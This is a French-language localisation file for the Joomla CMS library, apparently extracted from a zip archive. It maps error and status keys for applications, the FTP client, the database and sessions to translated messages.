PK!�39�kkfr-FR/fr-FR.lib_joomla.ininu&1i�; @date        2014-09-17
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


; Common boolean values
; Note: YES, NO, TRUE, FALSE are reserved words in INI format.

; Keep this string on top
JERROR_PARSING_LANGUAGE_FILE="&#160;: erreur(s) ligne(s) %s"

JLIB_APPLICATION_ERROR_ACCESS_FORBIDDEN="Accès interdit"
JLIB_APPLICATION_ERROR_APPLICATION_GET_NAME="JApplication: :getName() : impossible d'obtenir ou de parser le nom de la classe."
JLIB_APPLICATION_ERROR_APPLICATION_LOAD="Impossible de charger l'application&#160;: %s"
JLIB_APPLICATION_ERROR_BATCH_CANNOT_CREATE="Vous n'êtes pas autorisé à créer de nouveaux éléments dans cette catégorie."
JLIB_APPLICATION_ERROR_BATCH_CANNOT_EDIT="Vous n'êtes pas autorisé à effectuer des modifications sur un ou plusieurs des éléments sélectionnés."
JLIB_APPLICATION_ERROR_BATCH_FAILED="Le traitement par lot a échoué avec l'erreur suivante: %s"
JLIB_APPLICATION_ERROR_BATCH_MOVE_CATEGORY_NOT_FOUND="Impossible de trouver la catégorie de destination pour ce déplacement."
JLIB_APPLICATION_ERROR_BATCH_MOVE_ROW_NOT_FOUND="Impossible de trouver l'élément à déplacer."
JLIB_APPLICATION_ERROR_CHECKIN_FAILED="Échec du déverrouillage avec l'erreur suivante&#160;: %s"
JLIB_APPLICATION_ERROR_CHECKIN_NOT_CHECKED="L'élément n'est pas déverrouillé"
JLIB_APPLICATION_ERROR_CHECKIN_USER_MISMATCH="L'utilisateur qui déverrouille ne correspond pas à l'utilisateur/trice qui a verrouillé l'élément."
JLIB_APPLICATION_ERROR_CHECKOUT_FAILED="Echec du déverrouillage avec l'erreur suivante&#160;: %s"
JLIB_APPLICATION_ERROR_CHECKOUT_USER_MISMATCH="L'utilisateur qui déverrouille ne correspond pas à l'utilisateur qui a déverouillé l'élément."
JLIB_APPLICATION_ERROR_COMPONENT_NOT_FOUND="Composant introuvable"
JLIB_APPLICATION_ERROR_COMPONENT_NOT_LOADING="Erreur de chargement du composant&#160;: %1$s, %2$s"
JLIB_APPLICATION_ERROR_CONTROLLER_GET_NAME="JController: :getName() : impossible d'obtenir ou de parser le nom de la classe."
JLIB_APPLICATION_ERROR_CREATE_RECORD_NOT_PERMITTED="Création d'un enregistrement non permise"
JLIB_APPLICATION_ERROR_DELETE_NOT_PERMITTED="Suppression non permise"
JLIB_APPLICATION_ERROR_EDITSTATE_NOT_PERMITTED="L'édition du statut n'est pas autorisée"
JLIB_APPLICATION_ERROR_EDIT_ITEM_NOT_PERMITTED="L'édition n'est pas autorisée"
JLIB_APPLICATION_ERROR_EDIT_NOT_PERMITTED="Édition non permise"
JLIB_APPLICATION_ERROR_HISTORY_ID_MISMATCH="Erreur de restauration de la version depuis l'historique."
JLIB_APPLICATION_ERROR_INSUFFICIENT_BATCH_INFORMATION="Informations insuffisantes pour exécuter ce traitement."
JLIB_APPLICATION_ERROR_INVALID_CONTROLLER_CLASS="Classe du contrôleur invalide&#160;: %s"
JLIB_APPLICATION_ERROR_INVALID_CONTROLLER="Contrôleur invalide&#160;: %s"
JLIB_APPLICATION_ERROR_LAYOUTFILE_NOT_FOUND="Mise en page %s introuvable"
JLIB_APPLICATION_ERROR_LIBRARY_NOT_FOUND="Librairie introuvable"
JLIB_APPLICATION_ERROR_LIBRARY_NOT_LOADING="Erreur de chargement de la librairie: %1$s, %2$s"
JLIB_APPLICATION_ERROR_MENU_LOAD="Erreur de chargement du menu : %s"
JLIB_APPLICATION_ERROR_MODEL_GET_NAME="JModel: :getName() : impossible d'obtenir ou de parser le nom de la classe."
JLIB_APPLICATION_ERROR_MODULE_LOAD="Erreur de chargement du module %s"
JLIB_APPLICATION_ERROR_PATHWAY_LOAD="Impossible de charger le chemin&#160;: %s"
JLIB_APPLICATION_ERROR_REORDER_FAILED="Échec du tri. Erreur&#160;: %s"
JLIB_APPLICATION_ERROR_ROUTER_LOAD="Impossible de charger le routeur&#160;: %s"
JLIB_APPLICATION_ERROR_MODELCLASS_NOT_FOUND="Classe du modèle %s introuvable dans le fichier"
JLIB_APPLICATION_ERROR_SAVE_FAILED="L'enregistrement a échoué avec l'erreur suivante&#160;: %s"
JLIB_APPLICATION_ERROR_SAVE_NOT_PERMITTED="Enregistrement non permis"
JLIB_APPLICATION_ERROR_TABLE_NAME_NOT_SUPPORTED="Table %s non supportée. Fichier introuvable."
JLIB_APPLICATION_ERROR_TASK_NOT_FOUND="Tâche [%s] introuvable"
JLIB_APPLICATION_ERROR_UNHELD_ID="Vous n'êtes pas autorisé à utiliser ce lien pour accéder directement à cette page (#%d)."
JLIB_APPLICATION_ERROR_VIEW_CLASS_NOT_FOUND="Classe d'affichage introuvable [class, file] : %1$s, %2$s"
JLIB_APPLICATION_ERROR_VIEW_GET_NAME_SUBSTRING="JView: :getName() : votre nom de classe contient la sous-chaîne « view ». Ceci pose problème lors de l'extraction du nom de la classe à partir du nom de votre affichage d'objets. Évitez les noms d'objets avec la sous-chaîne « view »."
JLIB_APPLICATION_ERROR_VIEW_GET_NAME="JView::getName() : impossible d'obtenir ou de parser le nom de la classe."
JLIB_APPLICATION_ERROR_VIEW_NOT_FOUND="Affichage introuvable [name, type, prefix] : %1$s, %2$s, %3$s"
JLIB_APPLICATION_SAVE_SUCCESS="Élément enregistré."
JLIB_APPLICATION_SUBMIT_SAVE_SUCCESS="Élément proposé."
JLIB_APPLICATION_SUCCESS_BATCH="Traitement par lot effectué."
JLIB_APPLICATION_SUCCESS_ITEM_REORDERED="Élément réordonné."
JLIB_APPLICATION_SUCCESS_ORDERING_SAVED="Ordre enregistré"
JLIB_APPLICATION_SUCCESS_LOAD_HISTORY="Version précédente restaurée. Sauvegardée sur %s %s."

JLIB_LOGIN_AUTHENTICATE="Le nom d'utilisateur et le mot de passe ne correspondent pas"

JLIB_CACHE_ERROR_CACHE_HANDLER_LOAD="Impossible de charger le sous-programme de traitement du cache&#160;: %s"
JLIB_CACHE_ERROR_CACHE_STORAGE_LOAD="Impossible de charger la mémoire cache&#160;: %s"

JLIB_CAPTCHA_ERROR_PLUGIN_NOT_FOUND="Le plug-in Captcha n'est pas défini ou n'a pu être trouvé. Veuillez contacter un administrateur du site"

JLIB_CLIENT_ERROR_JFTP_NO_CONNECT="JFTP: :connect : impossible de se connecter à l'hôte ' %1$s ' sur le port ' %2$s '"
JLIB_CLIENT_ERROR_JFTP_NO_CONNECT_SOCKET="JFTP: :connect : impossible de se connecter à l'hôte ' %1$s ' sur le port ' %2$s '. Numéro d'erreur du socket&#160;: %3$s et message d'erreur&#160;: %4$s"
JLIB_CLIENT_ERROR_JFTP_BAD_RESPONSE="JFTP: :connect : mauvaise réponse. Réponse du serveur&#160;: %s [attendue&#160;: 220]"
JLIB_CLIENT_ERROR_JFTP_BAD_USERNAME="JFTP: :login : mauvais nom d'utilisateur. Réponse du serveur&#160;: %1$s [attendue&#160;: 331]. Nom d'utilisateur envoyé&#160;: %2$s"
JLIB_CLIENT_ERROR_JFTP_BAD_PASSWORD="JFTP: :login : mauvais mot de passe. Réponse du serveur&#160;: %1$s [attendue&#160;: 230]. Mot de passe envoyé&#160;: %2$s"
JLIB_CLIENT_ERROR_JFTP_PWD_BAD_RESPONSE_NATIVE="FTP: :pwd : mauvaise réponse"
JLIB_CLIENT_ERROR_JFTP_PWD_BAD_RESPONSE="JFTP: :pwd : mauvaise réponse. Réponse du serveur&#160;: %s [attendue&#160;: 257]"
JLIB_CLIENT_ERROR_JFTP_SYST_BAD_RESPONSE_NATIVE="JFTP: :syst : mauvaise réponse"
JLIB_CLIENT_ERROR_JFTP_SYST_BAD_RESPONSE="JFTP: :syst : mauvaise réponse. Réponse du serveur&#160;: %s [attendue&#160;: 215]"
JLIB_CLIENT_ERROR_JFTP_CHDIR_BAD_RESPONSE_NATIVE="JFTP: :chdir : mauvaise réponse"
JLIB_CLIENT_ERROR_JFTP_CHDIR_BAD_RESPONSE="JFTP: :chdir : mauvaise réponse. Réponse du serveur&#160;: %1$s [attendue&#160;: 250]. Chemin envoyé&#160;: %2$s"
JLIB_CLIENT_ERROR_JFTP_REINIT_BAD_RESPONSE_NATIVE="JFTP: :reinit : mauvaise réponse"
JLIB_CLIENT_ERROR_JFTP_REINIT_BAD_RESPONSE="JFTP: :reinit : mauvaise réponse. Réponse du serveur&#160;: %s [attendue&#160;: 220]"
JLIB_CLIENT_ERROR_JFTP_RENAME_BAD_RESPONSE_NATIVE="JFTP: :rename : mauvaise réponse"
JLIB_CLIENT_ERROR_JFTP_RENAME_BAD_RESPONSE_FROM="JFTP: :rename : mauvaise réponse. Réponse du serveur&#160;: %1$s [attendue&#160;: 350]. Chemin d'expédition envoyé&#160;: %2$s"
JLIB_CLIENT_ERROR_JFTP_RENAME_BAD_RESPONSE_TO="JFTP: :rename : mauvaise réponse. Réponse du serveur&#160;: %1$s [attendue&#160;: 250]. Chemin de destination envoyé&#160;: %2$s"
JLIB_CLIENT_ERROR_JFTP_CHMOD_BAD_RESPONSE_NATIVE="JFTP: :chmod : mauvaise réponse"
JLIB_CLIENT_ERROR_JFTP_CHMOD_BAD_RESPONSE="JFTP: :chmod : mauvaise réponse. Réponse du serveur&#160;: %1$s [attendue&#160;: 250]. Chemin envoyé&#160;: %2$s. Mode sent: %3$s"
JLIB_CLIENT_ERROR_JFTP_DELETE_BAD_RESPONSE_NATIVE="JFTP: :delete : mauvaise réponse"
JLIB_CLIENT_ERROR_JFTP_DELETE_BAD_RESPONSE="JFTP: :delete : mauvaise réponse. Réponse du serveur&#160;: %1$s [attendue&#160;: 250]. Chemin envoyé&#160;: %2$s"
JLIB_CLIENT_ERROR_JFTP_MKDIR_BAD_RESPONSE_NATIVE="JFTP: :mkdir : mauvaise réponse"
JLIB_CLIENT_ERROR_JFTP_MKDIR_BAD_RESPONSE="JFTP: :mkdir : mauvaise réponse. Réponse du serveur&#160;: %1$s [attendue&#160;: 257]. Chemin envoyé&#160;: %2$s"
JLIB_CLIENT_ERROR_JFTP_RESTART_BAD_RESPONSE_NATIVE="JFTP: :restart : mauvaise réponse"
JLIB_CLIENT_ERROR_JFTP_RESTART_BAD_RESPONSE="JFTP: :restart : mauvaise réponse. Réponse du serveur&#160;: %1$s [attendue&#160;: 350]. Restart point sent: %2$s"
JLIB_CLIENT_ERROR_JFTP_CREATE_BAD_RESPONSE_BUFFER="JFTP: :create : mauvaise réponse"
JLIB_CLIENT_ERROR_JFTP_CREATE_BAD_RESPONSE_PASSIVE="JFTP: :create : impossible d'utiliser le mode passif"
JLIB_CLIENT_ERROR_JFTP_CREATE_BAD_RESPONSE="JFTP: :create : mauvaise réponse. Réponse du serveur&#160;: %1$s [attendue&#160;: 150 or 125]. Chemin envoyé&#160;: %2$s"
JLIB_CLIENT_ERROR_JFTP_CREATE_BAD_RESPONSE_TRANSFER="JFTP: :create : Transfer Failed. Réponse du serveur&#160;: %1$s [attendue&#160;: 226]. Chemin envoyé&#160;: %2$s"
JLIB_CLIENT_ERROR_JFTP_READ_BAD_RESPONSE_BUFFER="JFTP: :read : mauvaise réponse"
JLIB_CLIENT_ERROR_JFTP_READ_BAD_RESPONSE_PASSIVE="JFTP: :read : impossible d'utiliser le mode passif"
JLIB_CLIENT_ERROR_JFTP_READ_BAD_RESPONSE="JFTP: :read : mauvaise réponse. Réponse du serveur&#160;: %1$s [attendue&#160;: 150 or 125]. Chemin envoyé&#160;: %2$s"
JLIB_CLIENT_ERROR_JFTP_READ_BAD_RESPONSE_TRANSFER="JFTP: :read : échec du transfert. Réponse du serveur&#160;: %1$s [attendue&#160;: 226]. Chemin envoyé&#160;: %2$s"
JLIB_CLIENT_ERROR_JFTP_GET_BAD_RESPONSE="JFTP: :get : mauvaise réponse"
JLIB_CLIENT_ERROR_JFTP_GET_PASSIVE="JFTP: :get : impossible d'utiliser le mode passif"
JLIB_CLIENT_ERROR_JFTP_GET_WRITING_LOCAL="JFTP: :get : impossible d'ouvrir le fichier local en écriture. Chemin local&#160;: %s"
JLIB_CLIENT_ERROR_JFTP_GET_BAD_RESPONSE_RETR="JFTP: :get : mauvaise réponse. Réponse du serveur&#160;: %1$s [attendue&#160;: 150 or 125]. Chemin envoyé&#160;: %2$s"
JLIB_CLIENT_ERROR_JFTP_GET_BAD_RESPONSE_TRANSFER="JFTP: :get : échec du transfert. Réponse du serveur&#160;: %1$s [attendue&#160;: 226]. Chemin envoyé&#160;: %2$s"
JLIB_CLIENT_ERROR_JFTP_STORE_PASSIVE="JFTP: :store : impossible d'utiliser le mode passif"
JLIB_CLIENT_ERROR_JFTP_STORE_BAD_RESPONSE="JFTP: :store : mauvaise réponse"
JLIB_CLIENT_ERROR_JFTP_STORE_READING_LOCAL="JFTP: :store : impossible d'ouvrir le fichier local en lecture. Chemin local&#160;: %s"
JLIB_CLIENT_ERROR_JFTP_STORE_FIND_LOCAL="JFTP: :store : impossible de trouver le fichier local. Chemin local&#160;: %s"
JLIB_CLIENT_ERROR_JFTP_STORE_BAD_RESPONSE_STOR="JFTP: :store : mauvaise réponse. Réponse du serveur&#160;: %1$s [attendue&#160;: 150 or 125]. Chemin envoyé&#160;: %2$s"
JLIB_CLIENT_ERROR_JFTP_STORE_DATA_PORT="JFTP: :store : impossible d'écrire vers le socket du port de données"
JLIB_CLIENT_ERROR_JFTP_STORE_BAD_RESPONSE_TRANSFER="JFTP: :store : échec du transfert. Réponse du serveur&#160;: %1$s [attendue&#160;: 226]. Chemin envoyé&#160;: %2$s"
JLIB_CLIENT_ERROR_JFTP_WRITE_PASSIVE="JFTP: :write : impossible d'utiliser le mode passif"
JLIB_CLIENT_ERROR_JFTP_WRITE_BAD_RESPONSE="JFTP: :write : mauvaise réponse"
JLIB_CLIENT_ERROR_JFTP_WRITE_BAD_RESPONSE_STOR="JFTP: :write : mauvaise réponse. Réponse du serveur&#160;: %1$s [attendue&#160;: 150 or 125]. Chemin envoyé&#160;: %2$s"
JLIB_CLIENT_ERROR_JFTP_WRITE_DATA_PORT="JFTP: :write : impossible d'écrire vers le socket du port de données"
JLIB_CLIENT_ERROR_JFTP_WRITE_BAD_RESPONSE_TRANSFER="JFTP: :write : échec du transfert. Réponse du serveur&#160;: %1$s [attendue&#160;: 226]. Chemin envoyé&#160;: %2$s"
JLIB_CLIENT_ERROR_JFTP_APPEND_PASSIVE="JFTP: :append: Impossible d'utiliser le mode passif"
JLIB_CLIENT_ERROR_JFTP_APPEND_BAD_RESPONSE="JFTP: :append: Mauvaise réponse"
JLIB_CLIENT_ERROR_JFTP_APPEND_BAD_RESPONSE_APPE="JFTP: :append: Mauvaise réponse. Réponse du serveur&nbsp;: %1$s [Attendu&nbsp;: 150 ou 125]. Envoyé&nbsp;: %2$s"
JLIB_CLIENT_ERROR_JFTP_APPEND_DATA_PORT="JFTP: :append: Impossible d'écrire sur la prise du port de données"
JLIB_CLIENT_ERROR_JFTP_APPEND_BAD_RESPONSE_TRANSFER="JFTP: :append: Erreur de transfert. Réponse du serveur&nbsp;: %1$s [Attendu&nbsp;: 226]. Envoyé&nbsp;: %2$s"
JLIB_CLIENT_ERROR_JFTP_SIZE_BAD_RESPONSE="JFTP: :size: Mauvaise réponse"
JLIB_CLIENT_ERROR_JFTP_SIZE_PASSIVE="JFTP: :size: Impossible d'utiliser le mode passif"
JLIB_CLIENT_ERROR_JFTP_LISTNAMES_PASSIVE="JFTP: :listNames : impossible d'utiliser le mode passif"
JLIB_CLIENT_ERROR_JFTP_LISTNAMES_BAD_RESPONSE="JFTP: :listNames : mauvaise réponse"
JLIB_CLIENT_ERROR_JFTP_LISTNAMES_BAD_RESPONSE_NLST="JFTP: :listNames : mauvaise réponse. Réponse du serveur&#160;: %1$s [attendue&#160;: 150 or 125]. Chemin envoyé&#160;: %2$s"
JLIB_CLIENT_ERROR_JFTP_LISTNAMES_BAD_RESPONSE_TRANSFER="JFTP: :listNames : échec du transfert. Réponse du serveur&#160;: %1$s [attendue&#160;: 226]. Chemin envoyé&#160;: %2$s"
JLIB_CLIENT_ERROR_JFTP_LISTDETAILS_BAD_RESPONSE="JFTP: :listDetails : mauvaise réponse"
JLIB_CLIENT_ERROR_JFTP_LISTDETAILS_PASSIVE="JFTP: :listDetails : impossible d'utiliser le mode passif"
JLIB_CLIENT_ERROR_JFTP_LISTDETAILS_BAD_RESPONSE_LIST="JFTP: :listDetails : mauvaise réponse. Réponse du serveur&#160;: %1$s [attendue&#160;: 150 or 125]. Chemin envoyé&#160;: %2$s"
JLIB_CLIENT_ERROR_JFTP_LISTDETAILS_BAD_RESPONSE_TRANSFER="JFTP: :listDetails : échec du transfert. Réponse du serveur&#160;: %1$s [attendue&#160;: 226]. Chemin envoyé&#160;: %2$s"
JLIB_CLIENT_ERROR_JFTP_LISTDETAILS_UNRECOGNISED="JFTP: :listDetails : format de listage de répertoire non reconnu"
JLIB_CLIENT_ERROR_JFTP_PUTCMD_UNCONNECTED="JFTP: :_putCmd : non connecté au port de contrôle"
JLIB_CLIENT_ERROR_JFTP_PUTCMD_SEND="JFTP: :_putCmd : impossible d'envoyer la commande %s"
JLIB_CLIENT_ERROR_JFTP_VERIFYRESPONSE="JFTP: :_verifyResponse : délai dépassé ou réponse non reconnue pendant l'attente d'une réponse du serveur. Réponse du serveur&#160;: %s"
JLIB_CLIENT_ERROR_JFTP_PASSIVE_CONNECT_PORT="JFTP: :_passive : non connecté au port de contrôle"
JLIB_CLIENT_ERROR_JFTP_PASSIVE_RESPONSE="JFTP: :_passive : délai dépassé ou réponse non reconnue pendant l'attente d'une réponse du serveur. Réponse du serveur&#160;: %s"
JLIB_CLIENT_ERROR_JFTP_PASSIVE_IP_OBTAIN="JFTP: :_passive : impossible d'obtenir l'IP et le port pour le transfert des données. Réponse du serveur&#160;: %s"
JLIB_CLIENT_ERROR_JFTP_PASSIVE_IP_VALID="JFTP: :_passive : IP et port pour le transfert des données invalides. Réponse du serveur&#160;: %s"
JLIB_CLIENT_ERROR_JFTP_PASSIVE_CONNECT="JFTP: :_passive : impossible de se connecter à l'hôte %1$s sur le port %2$s. Numéro d'erreur de socket&#160;: %3$s et message d'erreur&#160;: %4$s"
JLIB_CLIENT_ERROR_JFTP_MODE_BINARY="JFTP: :_mode : mauvaise réponse. Réponse du serveur&#160;: %s [attendue&#160;: 200]. Mode envoyé&#160;: Binaire"
JLIB_CLIENT_ERROR_JFTP_MODE_ASCII="JFTP: :_mode : mauvaise réponse. Réponse du serveur&#160;: %s [attendue&#160;: 200]. Mode envoyé&#160;: Ascii"
JLIB_CLIENT_ERROR_HELPER_SETCREDENTIALSFROMREQUEST_FAILED="Il semble que les identifiants utilisateur ne soient pas bons..."
JLIB_CLIENT_ERROR_LDAP_ADDRESS_NOT_AVAILABLE="Adresse non disponible."

JLIB_CMS_WARNING_PROVIDE_VALID_NAME="Merci de fournir un titre valide."

JLIB_DATABASE_ERROR_ADAPTER_MYSQL="L'adaptateur MySQL « mysql » n'est pas disponible."
JLIB_DATABASE_ERROR_ADAPTER_MYSQLI="L'adaptateur MySQL « mysqli » n'est pas disponible."
JLIB_DATABASE_ERROR_BIND_FAILED_INVALID_SOURCE_ARGUMENT="%s: :bind échoué. Argument source invalide."
JLIB_DATABASE_ERROR_ARTICLE_UNIQUE_ALIAS="Un autre article de cette catégorie possède le même alias (rappel : cet article peut se trouver dans la corbeille)."
JLIB_DATABASE_ERROR_CATEGORY_UNIQUE_ALIAS="Une autre catégorie avec la même catégorie parente possède le même alias (rappel : cette catégorie peut se trouver dans la corbeille)."
JLIB_DATABASE_ERROR_CHECK_FAILED="%s: :check échoué - %s"
JLIB_DATABASE_ERROR_CHECKIN_FAILED="%s: :checkIn échoué - %s"
JLIB_DATABASE_ERROR_CHECKOUT_FAILED="%s: :checkOut échoué - %s"
JLIB_DATABASE_ERROR_CHILD_ROWS_CHECKED_OUT="Lignes enfants invalidées."
JLIB_DATABASE_ERROR_CLASS_DOES_NOT_SUPPORT_ORDERING="%s ne supporte pas le tri."
JLIB_DATABASE_ERROR_CLASS_IS_MISSING_FIELD="Champ manquant dans la base de données&#160;: %s   %s."
JLIB_DATABASE_ERROR_CLASS_NOT_FOUND_IN_FILE="Classe du tableau %s introuvable dans le fichier."
JLIB_DATABASE_ERROR_CONNECT_DATABASE="Impossible de se connecter à la base de données&#160;: %s"
JLIB_DATABASE_ERROR_CONNECT_MYSQL="Impossible de se connecter à MySQL."
JLIB_DATABASE_ERROR_DATABASE_CONNECT="Impossible de se connecter à la base de données"
JLIB_DATABASE_ERROR_DATABASE_UPGRADE_FAILED="MySQL La mise à jour de la base données MySQL a échoué. Merci de corriger en allant dans <a href=\"index.php?option=com_installer&view=database\">Vérification de la Base de données</a>."
JLIB_DATABASE_ERROR_DELETE_CATEGORY="Données gauche - droite incohérentes. Impossible de supprimer la catégorie."
JLIB_DATABASE_ERROR_DELETE_FAILED="%s: :delete échoué - %s"
JLIB_DATABASE_ERROR_DELETE_ROOT_CATEGORIES="Les catégories racines ne peuvent pas être supprimées."
JLIB_DATABASE_ERROR_EMAIL_INUSE="Cette adresse e-mail est déjà utilisée. Merci d'utiliser une autre adresse e-mail."
JLIB_DATABASE_ERROR_EMPTY_ROW_RETURNED="La ligne de la base de données est vide."
JLIB_DATABASE_ERROR_FUNCTION_FAILED="Fonction DB échouée avec le numéro d'erreur %s <br /><font color='red'>%s</font>"
JLIB_DATABASE_ERROR_GET_NEXT_ORDER_FAILED="%s::getNextOrder échoué - %s"
JLIB_DATABASE_ERROR_GET_TREE_FAILED="%s: :getTree échoué - %s"
JLIB_DATABASE_ERROR_GETNODE_FAILED="%s: :_getNode échoué - %s"
JLIB_DATABASE_ERROR_GETROOTID_FAILED="%s: :getRootId échoué - %s"
JLIB_DATABASE_ERROR_HIT_FAILED="%s: :hit échoué - %s"
JLIB_DATABASE_ERROR_INVALID_LOCATION="%s: :setLocation - Emplacement invalide"
JLIB_DATABASE_ERROR_INVALID_NODE_RECURSION="%s: :move échoué - Impossible de déplacer le nœud pour en faire un enfant de lui-même"
JLIB_DATABASE_ERROR_INVALID_PARENT_ID="ID de parent invalide."
JLIB_DATABASE_ERROR_LANGUAGE_NO_TITLE="La langue doit avoir un titre"
JLIB_DATABASE_ERROR_LANGUAGE_UNIQUE_IMAGE="Une langue de contenu utilise déjà cette image."
JLIB_DATABASE_ERROR_LANGUAGE_UNIQUE_LANG_CODE="Un contenu langue existe déjà avec ce Tag de langue"
JLIB_DATABASE_ERROR_LANGUAGE_UNIQUE_SEF="Un contenu langue existe déjà avec ce code URL de langue"
JLIB_DATABASE_ERROR_LOAD_DATABASE_DRIVER="Impossible de charger le pilote de base de données&#160;: %s"
JLIB_DATABASE_ERROR_MENUTYPE="Certains éléments de menus ou certains modules de menus liés à ce type de menu sont invalidés par un autre utilisateur ou l'élément de menu par défaut est dans ce menu"
JLIB_DATABASE_ERROR_MENUTYPE_CHECKOUT="L'utilisateur invalidant n'est pas celui qui a invalidé ce menu ou le module de menu qui lui est associé."
JLIB_DATABASE_ERROR_MENUTYPE_EMPTY="Type de menu vide"
JLIB_DATABASE_ERROR_MENUTYPE_EXISTS="Ce type de menu existe&#160;: %s"
JLIB_DATABASE_ERROR_MENU_CANNOT_UNSET_DEFAULT="Le menu d'accueil pour les langues ne peut pas être indéterminé"
JLIB_DATABASE_ERROR_MENU_CANNOT_UNSET_DEFAULT_DEFAULT="Un élément de menu au moins doit être déterminé comme Défaut."
JLIB_DATABASE_ERROR_MENU_UNPUBLISH_DEFAULT_HOME="Impossible de dépublier la page d'accueil par défaut"
JLIB_DATABASE_ERROR_MENU_DEFAULT_CHECKIN_USER_MISMATCH="Le menu d'accueil actuel pour cette langue est invalidé"
JLIB_DATABASE_ERROR_MENU_UNIQUE_ALIAS="L'alias <strong>%1$s</strong> est déjà utilisé par le lien de menu <strong>%2$s</strong> dans le menu <strong>%3$s</strong> (rappel : ce lien de menu peut se trouver dans la corbeille)."
JLIB_DATABASE_ERROR_MENU_UNIQUE_ALIAS_ROOT="Un autre lien de menu possède le même alias dans la racine Un autre lien de menu avec le même parent possède cet alias (rappel : ce lien de menu peut se trouver dans la corbeille). La racine est le parent de plus haut niveau."
JLIB_DATABASE_ERROR_MENU_HOME_NOT_COMPONENT="L'élément de menu d'accueil doit être un composant."
JLIB_DATABASE_ERROR_MENU_HOME_NOT_UNIQUE_IN_MENU="Un menu ne doit contenir qu'une seule page d'accueil par défaut."
JLIB_DATABASE_ERROR_MENU_ROOT_ALIAS_COMPONENT="Un alias d'élément de menu de premier niveau ne peut être un 'composant'."
JLIB_DATABASE_ERROR_MENU_ROOT_ALIAS_FOLDER="Un alias d'élément de menu de premier niveau ne peut être  '%s' car '%s' est un sous-dossier de votre dossier d'installation Joomla."
JLIB_DATABASE_ERROR_MOVE_FAILED="%s: :move échoué - %s"
JLIB_DATABASE_ERROR_MUSTCONTAIN_A_TITLE_CATEGORY="La catégorie doit avoir un titre"
JLIB_DATABASE_ERROR_MUSTCONTAIN_A_TITLE_EXTENSION="L'extension doit avoir un titre"
JLIB_DATABASE_ERROR_MUSTCONTAIN_A_TITLE_MENUITEM="L'élément de menu doit avoir un titre."
JLIB_DATABASE_ERROR_MUSTCONTAIN_A_TITLE_MODULE="Le module doit avoir un titre"
JLIB_DATABASE_ERROR_MUSTCONTAIN_A_TITLE_UPDATESITE="Le site de mise à jour doit avoir un titre"
JLIB_DATABASE_ERROR_NEGATIVE_NOT_PERMITTED="%s ne peut être négatif"
JLIB_DATABASE_ERROR_NO_ROWS_SELECTED="Aucune ligne sélectionnée."
JLIB_DATABASE_ERROR_NOT_SUPPORTED_FILE_NOT_FOUND="Table %s non supportée. Fichier introuvable."
JLIB_DATABASE_ERROR_NULL_PRIMARY_KEY="Clé primaire nulle non autorisée."
JLIB_DATABASE_ERROR_ORDERDOWN_FAILED="%s: :orderDown échoué - %s"
JLIB_DATABASE_ERROR_ORDERUP_FAILED="%s: :orderUp échoué - %s"
JLIB_DATABASE_ERROR_PLEASE_ENTER_A_USER_NAME="Veuillez saisir un nom d'utilisateur."
JLIB_DATABASE_ERROR_PLEASE_ENTER_YOUR_NAME="Veuillez saisir votre nom."
JLIB_DATABASE_ERROR_PUBLISH_FAILED="%s: :publish échoué - %s"
JLIB_DATABASE_ERROR_REBUILD_FAILED="%s: :rebuild échoué - %s"
JLIB_DATABASE_ERROR_REBUILDPATH_FAILED="%s: :rebuildPath échoué - %s"
JLIB_DATABASE_ERROR_REORDER_FAILED="%s: :reorder échoué - %s"
JLIB_DATABASE_ERROR_REORDER_UPDATE_ROW_FAILED="%s : :reorder mise à jour de la ligne %s échouée - %s"
JLIB_DATABASE_ERROR_ROOT_NODE_NOT_FOUND="Nœud racine introuvable."
JLIB_DATABASE_ERROR_STORE_FAILED_UPDATE_ASSET_ID="Le champ asset_id n'a pas pu être mis à jour"
JLIB_DATABASE_ERROR_STORE_FAILED="%1$s: :store échoué<br />%2$s"
JLIB_DATABASE_ERROR_USERGROUP_PARENT_ID_NOT_VALID="Il faut au moins un groupe d'utilisateurs racine."
JLIB_DATABASE_ERROR_USERGROUP_TITLE="Le groupe d'utilisateurs doit avoir un titre"
JLIB_DATABASE_ERROR_USERGROUP_TITLE_EXISTS="Le titre du groupe d'utilisateurs existe déjà. Le titre doit être unique."
JLIB_DATABASE_ERROR_USERLEVEL_NAME_EXISTS="Le niveau d'accès &quot;%s&quot; existe déjà."
JLIB_DATABASE_ERROR_USERNAME_CANNOT_CHANGE="Impossible d'utiliser ce nom d'utilisateur"
JLIB_DATABASE_ERROR_USERNAME_INUSE="Nom d'utilisateur utilisé"
JLIB_DATABASE_ERROR_VALID_AZ09="Veuillez entrer un nom d'utilisateur valide. Sans espaces au début ou à la fin, au moins %d caractères, ne doit <strong>pas</strong> contenir les caractères suivants : < > \ &quot; ' &#37; ; ( ) & et ne doit pas dépasser 150 caractères."
JLIB_DATABASE_ERROR_VALID_MAIL="L'adresse e-mail saisie n'est pas valide. Veuillez saisir une autre adresse e-mail."
JLIB_DATABASE_ERROR_VIEWLEVEL="Le niveau d'affichage doit avoir un titre"
JLIB_DATABASE_FUNCTION_NOERROR="La fonction DB ne rapporte aucune erreur"
JLIB_DATABASE_QUERY_FAILED="Requête de base de données échouée (erreur # %s): %s"

JLIB_DOCUMENT_ERROR_UNABLE_LOAD_DOC_CLASS="Impossible de charger la classe du document"
JLIB_ENVIRONMENT_SESSION_EXPIRED="Votre session a expiré. Veuillez vous reconnecter."
JLIB_ENVIRONMENT_SESSION_INVALID="Cookie de session invalide. Vérifier que le navigateur accepte les cookies."
JLIB_ERROR_COMPONENTS_ACL_CONFIGURATION_FILE_MISSING_OR_IMPROPERLY_STRUCTURED="Le fichier de configuration des droits du composant %s est manquant ou incorrectement structuré."
JLIB_ERROR_INFINITE_LOOP="Boucle infinie détectée dans JError"
JLIB_EVENT_ERROR_DISPATCHER="JEventDispatcher::register : sous-programme de traitement des événements non reconnu. Sous-programme&#160;: %s"
JLIB_FILESYSTEM_BZIP_NOT_SUPPORTED="BZip2 non supporté"
JLIB_FILESYSTEM_BZIP_UNABLE_TO_READ="Impossible de lire l'archive (bz2)"
JLIB_FILESYSTEM_BZIP_UNABLE_TO_WRITE="Impossible d'écrire l'archive (bz2)"
JLIB_FILESYSTEM_BZIP_UNABLE_TO_WRITE_FILE="Impossible d'écrire le fichier (bz2)"
JLIB_FILESYSTEM_GZIP_NOT_SUPPORTED="Zlib non supporté"
